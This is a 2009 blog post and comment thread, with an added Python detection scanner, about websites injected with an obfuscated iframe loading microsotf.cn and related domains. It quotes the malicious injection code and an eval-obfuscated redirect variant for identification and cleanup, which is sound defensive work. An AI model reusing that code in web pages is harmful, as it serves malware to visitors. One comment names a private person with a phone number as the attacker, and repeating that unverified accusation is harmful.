Web site hack loading microsotf.cn

Filed Under Hacks and Mods on 2009-07-06, 15:21

I came back from vacation to find that some of my sites had been compromised. If you’re also someone whose websites have been compromised with an iframe loading microsotf.cn, please join the conversation on freenode (chat.freenode.com) in #microsotf.cn. If you don’t have an IRC client, you can use the webchat. Here are some symptoms that hopefully Google will index and help you find this post:

The inserted code:

echo '<script>document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');</script>';

The syntax error that appears:

Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING, expecting ',' or ';'

It appears the affected files are index.php, index.html and login.php.

This is the IP you should block the hell out of: 91.212.198.37
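A scanner for the injection shown above, added here as an example (it is not the blog author's or any commenter's tooling): it folds the `"a"+''+'b'` string fragments back into one literal so the iframe and its target domain become greppable, and reports only iframes that were hidden that way. The domain watch list and the file suffixes it scans are assumptions taken from this post and its comments.

```python
"""Scanner for the concatenation-obfuscated iframe injection shown above.

Added example, not the blog author's tooling. KNOWN_DOMAINS and SCAN_SUFFIXES
are assumptions drawn from the post and its comments.
"""
import re
from pathlib import Path
from typing import Dict, List

# One JS string literal, single- or double-quoted, honouring backslash escapes.
_STR = r'"(?:\\.|[^"\\])*"|\'(?:\\.|[^\'\\])*\''
LITERAL_RE = re.compile(_STR)
# Two or more literals joined by "+": the obfuscation used by the injected code.
CONCAT_RE = re.compile(rf'(?:{_STR})(?:\s*\+\s*(?:{_STR}))+')
# src attribute of an iframe tag, quoted or not.
IFRAME_RE = re.compile(r'<iframe\b[^>]*\bsrc="?([^"\s>]+)', re.IGNORECASE)

# Domains named in the post and comments (constructed watch list).
KNOWN_DOMAINS = ("microsotf.cn", "updatedate.cn", "vipprojects.cn")
SCAN_SUFFIXES = {".php", ".html", ".htm", ".asp", ".js"}

# The injected line quoted in the post, embedded here as sample input.
INJECTED_SAMPLE = r"""echo '<script>document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');</script>';"""


def _unescape(literal: str) -> str:
    """Drop the surrounding quotes and resolve simple escapes (backslash-quote to quote)."""
    return re.sub(r'\\(.)', r'\1', literal[1:-1])


def fold_concats(text: str) -> str:
    """Rewrite every run of '+'-joined string literals as one literal."""
    def join(match) -> str:
        parts = LITERAL_RE.findall(match.group(0))
        return '"' + "".join(_unescape(p) for p in parts) + '"'
    return CONCAT_RE.sub(join, text)


def find_injected_iframes(text: str) -> List[str]:
    """Return iframe src values that become visible only after folding."""
    # A plainly written iframe is visible before folding and is not reported.
    visible = set(IFRAME_RE.findall(text))
    return [s for s in IFRAME_RE.findall(fold_concats(text)) if s not in visible]


def is_known_domain(src: str) -> bool:
    """True when the revealed src points at one of the listed domains."""
    return any(domain in src for domain in KNOWN_DOMAINS)


def scan_tree(root: str) -> Dict[str, List[str]]:
    """Walk a web root and map each file with hidden iframes to their src values."""
    hits: Dict[str, List[str]] = {}
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in SCAN_SUFFIXES:
            continue
        srcs = find_injected_iframes(path.read_text(errors="replace"))
        if srcs:
            hits[str(path)] = srcs
    return hits

if __name__ == "__main__":
    for src in find_injected_iframes(INJECTED_SAMPLE):
        print(src, "known" if is_known_domain(src) else "unlisted")
```

Run `scan_tree("/path/to/webroot")` on a document root to list affected files; an unlisted domain in the output is still a hit worth inspecting, since the comments below report several variants.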


Comments


  1. Matt Swanner on July 7th, 2009 10:03 am

    Little bastard crawled through my sites and hit most of them – sites spread across three servers. Makes me wonder what the endgame is – malware, fake traffic, etc…dicks.

    Thanks for the post.

  2. Eddie H on July 8th, 2009 1:33 pm

    Mine too. I have restored my original index.html and index.php files, but a few hours later, the sites are hacked again. I have my files all set to 644, yet how are they continuing to hack in? Nasty bugger!

  3. Darren on July 8th, 2009 7:57 pm

    I am having the same issue with our company site, is there a permanent fix for this?

  4. Randy on July 9th, 2009 12:18 am

    Seems to be originating from the Academy of Sciences, Federation of Russia Their equivalent to our ITT Tech) using their campus servers in Kazakstan and Latvia before running through the European Union then jumping the Atlantic to here. The student is Nevdomskiy Alexey Alexeevich and can be reached at +79024883214

  5. Randy on July 9th, 2009 12:23 am

    The safe side is to block all their servers from 91.212.*.*, unless of course you do regular business with the russian students' bots. ;-)

  6. Matt Swanner on July 9th, 2009 12:44 pm

    If you have a server administrator, contact them. If you're on a shared hosting plan, contact them, and click the link below for a tutorial on blocking IPs using .htaccess.

    http://www.clockwatchers.com/htaccess_block.html

  7. acenterprise on July 11th, 2009 8:58 am

    http://rockymountainenvironmental.com/
    07/04/09 — 8:16am
    Altered files: index.htm, index.html, default.asp, main.html
    Offending Code: <script>document.write("<if"+''+'ra'+''+"m"+'e s'+"rc="h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2>');</script><script>document.write("<if"+'ra'+"m"+'e s'+"rc="h"+'tt'+"p:"+''+"/"+'/mic'+"roso"+'t'+'f.c'+"n"+'/'+"" wid"+'th=1 he'+"igh"+'t'+"="+"2>');</script><script>document.write("<"+"i"+"f"+"ram"+"e sr"+"c="h"+"t"+"tp"+":"+"/"+"/tr"+"ught"+""+"s"+"a.c"+"o"+"m/" wid"+"th=1 he"+"ight"+"="+"2></if"+"r"+"a"+""+"me>");</script>
    The Script failed to redirect due to conflict between my script call and my arguments. Repaired files 07/06/09 after discovery.

    07/09/09 — 6:11AM
    NEW OFFENDING CODE
    <script>eval("d((*)&!o$^!%c$[[^@&um((*)&!e$[[^@&n[@&%^t.w$[[^@&r((*)&!i((*)&!t$^!%e(&@)&]('(&@)&]</((*)&!i$[[^@&f((*)&!r$^!%a$^!%m((*)&!e>'$^!%)$[[^@&;[@&%^".replace(/(&@)&]|$^!%|((*)&!|$[[^@&|[@&%^/ig, ""))</script>
    This redirect bypassed my script calls and proceeded to download malware.
    Malware: [braviax (fakealeart Trojan)]& [ID12 Undetermined self replicating virus]
    I have closed down any server-side includes that are not necessary, changed passwords, and contacted Web.com to block IP as I as a client don't have access or admin rights to .htaccess. Best of luck to all.
    (Allen)

  8. flandercan on July 12th, 2009 6:26 am

    Hi,

    I run a number of servers and only found this hack on an SMF forum on one of the accounts. The files are being changed using FTP; I have lots of evidence in my logs.

    I'm using Ubuntu servers and used the following command to find all the altered files:

    > grep -r kPvOkYUlTEBvLmAPjYUP *

    Also used iptables to block the IPs seen in logs (yes, more than one):

    iptables -A INPUT -m iprange --src-range 91.212.198.0-91.212.198.255 -j DROP
    iptables -A INPUT -m iprange --src-range 68.161.24.0-68.161.24.255 -j DROP
    iptables -A INPUT -m iprange --src-range 91.212.19.0-91.212.19.255 -j DROP

    91.212.198.x – Goes back to a Linux or Unix box
    68.161.247.75 – Goes back to an MS2003 Small Business Server (and looks like it's owned by http://www.euromediapartners.co.uk) although their web server is on a different address.

    I found the hack in index.php, main.php, index.html and login.php

    FTP log shows these IPs attacking a specific account to get the password, then over approx 1 week accessing the site every day at different times.

    Thanks
    Paul Flanders
    http://www.fcconsultancy.co.uk

  9. Name on July 12th, 2009 6:37 pm

    Shouldn't that first iptables line be:-

    iptables -A INPUT -m iprange --src-range 68.161.247.0-68.161.247.255 -j DROP

    ?

  10. Name on July 12th, 2009 6:38 pm

    D'Oh! I meant second line, sorry :blush:

  11. Dan on July 13th, 2009 9:24 pm

    This hit all 3 of my sites and has been driving me nuts to clear. I used cpanel to deny IP's to the ones you listed and I have taken out that awesome script from my index.php files and hopefully it is gone forever!

  12. Name on July 13th, 2009 10:43 pm

    Just pulled the latest code from a site which contains updatedate.cn which is live and waiting with an empty site.

  13. C4talyst on July 14th, 2009 8:41 am

    Blocking IPs is worthless at stopping this… CHANGE YOUR FTP PASSWORDS. Better yet, stop using FTP… use SFTP.

  14. Name on July 15th, 2009 12:34 pm

    This malware affected each website I worked on during the last week. Sites I didn't update were not affected. I replaced all the affected index files last night and continue to monitor the index date-stamps via FTP.

    I found this morning that the bugger re-infected 2 of 4 previously infected sites. The script was re-introduced to the 2 websites where I *did not* yet change the password. Now I've changed the FTP password on those as well; hopefully it's done!!!

  15. Phil on July 16th, 2009 6:12 pm

    Who here is using Filezilla and got this hack? Raise your hand.

    *Raises hand* ..

    here's a post I made on another blog:

    Ok, about 8 of my websites were hit by this microsotf.cn iFrame script. And here’s the really troubling part: the code was inserted not just into index.php files, but also into TEMPLATE files located in a separate (non browsable) directory. Could be because the affected template files are called main.html, so some automated process thought it was an index equivalent, but much more lamely it could mean that there is live (human) intervention into the code-installation process.

    I fixed all of the files, reset my ftp password, and have had two of my sites re-hacked since then.

    This is the first I’ve heard about the possibility of FTP password files being compromised by malware or what-have-you, so I will try deleting all those saved passwords, resetting passwords on the server side (again), and maybe even switching ftp clients (right now I use Filezilla).

    Just out of curiosity, WHO HERE IS USING FILEZILLA AND HAS BEEN HACKED? Raise your hand!

    *Raises hand*

    There’s gotta be some pattern.

    -Phil

  16. edrabbit on July 16th, 2009 6:23 pm

    I was using Filezilla on the machine that was compromised. This is definitely one of the targeted FTP clients.

  17. Name on July 23rd, 2009 7:06 pm

    What exactly is causing this? Some douchebag modified index files in 6 of our sites, logging into FTP with the correct password for EACH site. Each site uses a different, completely random password.

  18. JR on July 25th, 2009 12:21 pm

    I got hacked around the 13th. They entered and put the code in the index file of one site, though they got into a second account and did not change the code. I was using Filezilla at the time and didn't have wordpress updated to the latest edition.

    I went ahead and blocked IPs, but was wondering if any of the earlier posters have had any success in getting rid of these SOBs via password changes, shift to SFTP etc.
    Thanks in advance for any help

  19. Name on July 25th, 2009 4:50 pm

    I posted the reply two above this one. I found the solution. What happens is you get a virus, and it steals your Filezilla history file. I have 4 computers, and around 10 ftp accounts on different domains/servers. We had 4 sites hit on personal server, and on my work server 2 accounts were hit. I was the only one that logged into those sites. On my computers only 1 had logged into the 2 work ftp accounts. That computer was compromised. I did a virus scan and came up with nothing in AVG, however, I rescanned with NOD32 and it discovered a fin Sheur2 Trojan.

    That trojan I have linked to the stolen Filezilla file. I have since formatted that computer, and all is well. Make sure you change all FTPs AFTER removing the virus. But that's the easiest way to determine which PC was hit if you have multiple: match the access log to the Filezilla history.

  20. Dan on July 25th, 2009 5:19 pm

    Does anyone have LiberKey installed on a pen drive??? That's where I found some viruses and trojan horses including the one mentioned above.

  21. brainasium on July 25th, 2009 9:18 pm

    Appears that there is a variant updatedate.cn. I have cleaned up my files 4 times already. Changed ftp passwords. Changed root password. Unfortunately I cannot use SFTP because the damn host doesn't support it. Chrome and Firefox continue to give Malware warnings on exploited pages. Terrible for business.

  22. brainasium on July 25th, 2009 9:20 pm

    @Name. I used WS-FTP and still got the problem. I don't believe it's just a FileZilla problem.

  23. JR on July 26th, 2009 11:14 am

    Where have you guys found infections? I only found the code on the index file of the main site. Did anyone find hidden snippets in wordpress files or any database intrusions? Also, from my FTP logs, it only looks like they were signed in briefly. It appeared the index file was the only one pulled.

    Lastly, if a trojan is found, do you have to reformat the comp or just pull the infection?

  24. Dan on July 26th, 2009 3:04 pm

    They changed my index.php file as well as adding some subdirectories that looked like they should exist. Things like /language and /js were showing up as sub folders with a bunch of crap that they shouldn't have.

    I would suggest upgrading your wordpress install and then deleting everything from the directory trees and files that do not have a modified date of the day you ran the update. Save a few files like the wp-config.php and your upload directory.

    I had to do that a few times to catch everything along with change my FTP passwords on all my sites and then I blocked specific IP addresses that were generating bad traffic to my site. I then had to manually edit all the index.php files and remove the extra script tags it added to the bottoms of each page. After all that finally it has been 3 weeks and I think I might be free!

  25. JR on July 26th, 2009 6:45 pm

    ace,

    have you had any problems after removing the trojans? What did you do to clear your computer?

    Also, have you switched from unsecure FTP to SFTP, changed computers, etc?

  26. Nick on July 26th, 2009 6:54 pm

    This spyware affects all files that have common filenames.

    index, main, default, home, and more I assume.

    I use globalscape cuteftp and all of my sites that I access on a normal basis were infected.

    Some sites were crawled by google and categorized as malicious.

    Even some sites that I did not access recently were infected.

    I have to assume that it is a spyware that reads FTP logs/saved passwords on your computer, then later on FTPs in with admin access and overwrites a bunch of files.

    Clean PC.
    Change FTP passwords.
    Re-upload indexes.

  27. JR on July 26th, 2009 10:08 pm

    Nick,

    Did you find a specific virus or trojan on your computer? Trying to figure out if more than my FTP was compromised. I had the updatedate.cn code on one index, but they entered into at least one other site which I can't find any changes on. It had hackersafe running on it, not sure if that was a deterrent or not, but they did avoid those sites.

  28. Nick on July 27th, 2009 12:36 am

    Spybot was unable to find and remove it.

    I fixed it by doing a system restore and THEN a scan. It found a lot of stuff, but as usual, most of it is weird cookie stuff so I didn't pay attention to any specifics.

    I manually deleted a few files in the system32 directory.

    When I was infected, I had all sorts of problems, including a new desktop background saying I was infected. All these issues were rectified by system restore.

    I would just check all files that have index* in their name and see if anything was changed. Or, do a search on your server for files changed within certain dates.

    I have a theory, that it disguises itself as an adobe update or a java update, one of those.

  29. JR on July 27th, 2009 11:45 am

    Okay, I've run just about every spyware program around and found a few infections on my main computer.

    However, I also noticed that one site I had connected to using SFTP was not affected while the ones I used Filezilla or Dreamweaver (with FTP) were affected.

    Have switched to SFTP on everything and am keeping fingers crossed. Hope this helps anyone with the problem and would appreciate hearing more from people who have fixed the issue. From the number of posters that have stopped posting, it looks like they may have fixed this.

  30. ET on July 28th, 2009 9:48 pm

    Some of my Web clients got infected so I had them all change their passwords. I use Filezilla to FTP. I thought that the common denominator was Filezilla but other posters FTP'd using other programs. I had my web client change her password and I never found out what she changed it to and have not FTP'd her files since the new password and she got hacked again. So we do know that changing passwords doesn't work. But someone wrote and said you must get the virus out of your computer first before you deal with changing passwords. According to the above post, is this the virus?: fin Sheur2 Trojan. Should I stop using Filezilla and instead use Dreamweaver to FTP?

  31. cindy on July 29th, 2009 1:04 pm

    Hi, I posted 2 weeks ago and I'm checking in to see what problems are still circling, or if there are new variants of the updatedate.cn. My websites that were infected were the ones to which I had recently uploaded changes. Other sites were not compromised if I hadn't touched them. I'm using Dreamweaver FTP.

    I also somehow had a backdoor setup/ trojan downloader, the fake security alert problem, and finally, porn sites popping open on my machine. It was horrible. My other machine got infected from visiting a site that had the sheur virus and it was nasty to get rid of it. I think I got every bad hack within the 2-week period beginning July 3.

    So far, with the changed passwords on all FTP accounts, the sites are fine. It's been 2 weeks. I still check them all nervously though.

  32. JR on July 29th, 2009 1:13 pm

    I've been okay for a few days. Still nervous. Spent about 60 hours running every AV and Spyware detector. Changed from Filezilla to SFTP, changed all passwords, etc.

    Been pulling FTP access records and they show the attackers trying, but failing to get in. Clearly looks like robots, as they are very quick repeat attempts.

    Aside from websites, did anyone else have personal/banking compromised? Or were the websites the only issue. Still freaking out a bit.

  33. Spencer on July 30th, 2009 5:05 am

    This has happened a few times on my sites, and have had a read through your comments.

    I have not used Filezilla, only used Dreamweaver's built in FTP program. It has attacked my ASP and PHP files, and now links to http://vipprojects.cn.

    The hosting company says its down to script vulnerabilities in my site. Any suggestions, as this seems like something that doesn't want to go away!

  34. Oliver on August 1st, 2009 1:39 pm

    I removed all FTP access from my site and the problem is solved. This is fine with me as nobody needs FTP for my site. Unfortunately for some of you, this isn't the case but it seems this is definitely an FTP issue.

  35. Oliver on August 1st, 2009 1:41 pm

    Forgot to mention that a lot of these attacks are from China

  36. ET on August 2nd, 2009 3:46 am

    My client needs her site fixed and I can not figure out how this hacker is getting in. Her site is plain html and I'm using Filezilla. AVG and Malwarebytes are not finding it. Now google is saying this when you type in her site in google: “this site may harm your computer”. This is just awful. Now I have to deal with google. I've had her change her password and I stopped ftping her index page for a week but the hack keeps coming back. I also learned today to set permissions in Filezilla by right clicking on the index page but I don't know if that will work yet. I also blocked IP addresses today (91.212.198.37, correct)? I also talked with her hosting for a long time and they told me to go to safeweb.norton.com and enter microsotf.cn to see what comes up and I did that and 2 viruses were listed but that doesn't help me. Is the only way to solve this by switching to SFTP? How do you even do that? Should I do a system restore? Is there anyone who can answer my questions?

  37. Oliver on August 2nd, 2009 8:40 am

    The only way I have found to stop this is to disable all FTP accounts. That has solved all my problems but again, I am sure this is not an option for most of you. Sorry

  38. ET on August 2nd, 2009 2:49 pm

    Oliver,
    How did you disable your FTP accounts? Within the CPanel of the hosts?

  39. Oliver on August 2nd, 2009 3:30 pm

    Actually I disabled anonymous FTP and deleted an FTP account of one of my admins. Checking through the logs, I found that his account was the one that had been used to access the server files so it is quite possible that his computer had been compromised. I did all these actions through the host's cPanel.

  40. Oliver on August 2nd, 2009 3:35 pm

    Day 2 and site is still untouched even though I see many hits from IP's in China, Russia, Kazakhstan, Norway and many others. Fingers are crossed and I get nervous every time I click on my site.

  41. ET on August 3rd, 2009 1:31 pm

    Oliver,
    Thank you for your answer. I will take those steps. I get so nervous too. My heart drops when I see that stupid script in my client's index pages.

  42. ET on August 3rd, 2009 2:05 pm

    In response to this: “I found that his account was the one that had been used to access the server files so it is quite possible that his computer had been compromised.” Does that mean that your client now has this virus and he needs to take all the measures you did to secure his computer and/or site?

  43. Oliver on August 3rd, 2009 5:24 pm

    The site is actually mine and it is a Vbulletin site. There is no virus anywhere because the script was supposed to redirect anyone that clicked on it to another site with the virus on it. Unfortunately for whoever wrote the code, Vbulletin only interpreted it as a Parse error and would show you which file the error was on and which line of code.
    This is what shows up as the error where ** is my site directory:

    Parse error: syntax error, unexpected ';', expecting T_VARIABLE or '$' in /**/**/**/showthread.php on line 352

  44. Oliver on August 3rd, 2009 5:25 pm

    Day 3 and still untouched

  45. Oliver on August 4th, 2009 7:05 pm

    Day 4 and still clean…I think my solution worked :)

  46. ET on August 5th, 2009 2:02 pm

    Day 4 for me too
    setting permissions in Filezilla (index pages now 644), cleaning out the bad script in index pages, blocking IP, updating Adobe Acrobat Reader, changing passwords (although that didn't work in the past), disabling anonymous FTP in CPanel for Bluehost clients, doing scans with AVG and Malwarebytes (scanning never found anything in the past though), turning “register_globals” to “Off” in my php.ini file for my online store – I think those are all the steps I took. One step I didn't take yet but will is to update Cubecart for my online store. Not many people are posting anymore so I wonder if this hacker is busted.

  47. Oliver on August 6th, 2009 10:05 pm

    Day 5 and I think I am in the clear :) :) :)

  48. ET on August 8th, 2009 7:23 am

    I’m in the clear too so far.
